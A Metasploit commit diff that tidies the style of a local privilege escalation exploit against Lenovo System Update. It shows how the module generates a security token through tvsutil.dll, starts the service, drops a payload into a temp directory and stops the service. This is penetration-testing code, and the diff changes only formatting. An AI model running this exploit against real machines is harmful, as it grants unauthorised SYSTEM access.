Do minor code cleanup

jvazquez-r7 · jvazquez-r7 · commit 3aa1ffb4f5cd · 2015-05-22T16:20:36.000-05:00
diff --git a/modules/exploits/windows/local/lenovo_systemupdate.rb b/modules/exploits/windows/local/lenovo_systemupdate.rb
@@ -4,32 +4,31 @@
 ##
 
 class Metasploit3 < Msf::Exploit::Local
-  Rank = ExcellentRanking
-
   include Msf::Exploit::EXE
   include Msf::Post::File
   include Msf::Exploit::FileDropper
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Services
 
+  Rank = ExcellentRanking
+
   def initialize(info={})
     super(update_info(info, {
       'Name'            => 'Lenovo System Update Privilege Escalation',
       'Description'     => %q{
-        The named pipe, \SUPipeServer, can be accessed by normal users to interact
-        with the System update service. The service provides the possibility to execute
-        arbitrary commands as SYSTEM if a valid security token is provided. This token can
-        be generated by calling the GetSystemInfoData function in the DLL tvsutil.dll
-
-        Please note that the System Update is stopped by default but can be started/stopped calling
-        the Executable ConfigService.exe
+        The named pipe, \SUPipeServer, can be accessed by normal users to interact with the
+        System update service. The service provides the possibility to execute arbitrary
+        commands as SYSTEM if a valid security token is provided. This token can be generated
+        by calling the GetSystemInfoData function in the DLL tvsutil.dll. Please, note that the
+        System Update is stopped by default but can be started/stopped calling the Executable
+        ConfigService.exe.
       },
       'License'         => MSF_LICENSE,
       'Author'          =>
         [
-          'Micahel Milvich',   # vulnerability discovery, advisory
-          'Sofiane Talmat',    # vulnerability discovery, advisory
-          'h0ng10' # Metasploit module
+          'Micahel Milvich', # vulnerability discovery, advisory
+          'Sofiane Talmat',  # vulnerability discovery, advisory
+          'h0ng10'           # Metasploit module
         ],
       'Arch'            => ARCH_X86,
       'Platform'        => 'win',
@@ -118,13 +117,14 @@ def write_named_pipe(pipe, command)
 
 
   def get_security_token(lenovo_directory)
-    if not client.railgun.get_dll('tvsutil') then
+    unless client.railgun.get_dll('tvsutil')
       client.railgun.add_dll('tvsutil', "#{lenovo_directory}\\tvsutil.dll")
-      client.railgun.add_function("tvsutil", "GetSystemInfoData", "DWORD", [["PWCHAR","systeminfo","out"]], windows_name = nil, calling_conv = "cdecl")
+      client.railgun.add_function('tvsutil', 'GetSystemInfoData', 'DWORD', [['PWCHAR', 'systeminfo', 'out']], windows_name = nil, calling_conv = 'cdecl')
     end
 
     dll_response = client.railgun.tvsutil.GetSystemInfoData(256)
-    return dll_response['systeminfo'][0,40]
+
+    dll_response['systeminfo'][0,40]
   end
 
 
@@ -139,23 +139,23 @@ def exploit
     end
 
     su_directory = service_info('SUService')[:path][1..-16]
-    print_status("Starting service via ConfigService.exe")
-    config_service(su_directory, "start")
-    print_status("Giving the service some time to start...")
-    sleep(datastore['sleep'])
+    print_status('Starting service via ConfigService.exe')
+    config_service(su_directory, 'start')
+
+    print_status('Giving the service some time to start...')
+    Rex.sleep(datastore['Sleep'])
 
     print_status("Getting security token...")
     token = get_security_token(su_directory)
     vprint_good("Security token is: #{token}")
 
-
-    if datastore['WritableDir'] and not datastore['WritableDir'].empty?
-      temp_dir = datastore['WritableDir']
-    else
+    if datastore['WritableDir'].nil? || datastore['WritableDir'].empty?
       temp_dir = get_env('TEMP')
+    else
+      temp_dir = datastore['WritableDir']
     end
 
-    print_status("Using #{temp_dir} to drop malicious exe")
+    print_status("Using #{temp_dir} to drop the payload")
 
     begin
       cd(temp_dir)
@@ -186,8 +186,8 @@ def exploit
       fail_with(Failure::Unknown, 'Failed to write to pipe')
     end
 
-    print_status("Stopping service via ConfigService.exe")
-    config_service(su_directory, "stop")
+    print_status('Stopping service via ConfigService.exe')
+    config_service(su_directory, 'stop')
   end
 
 end
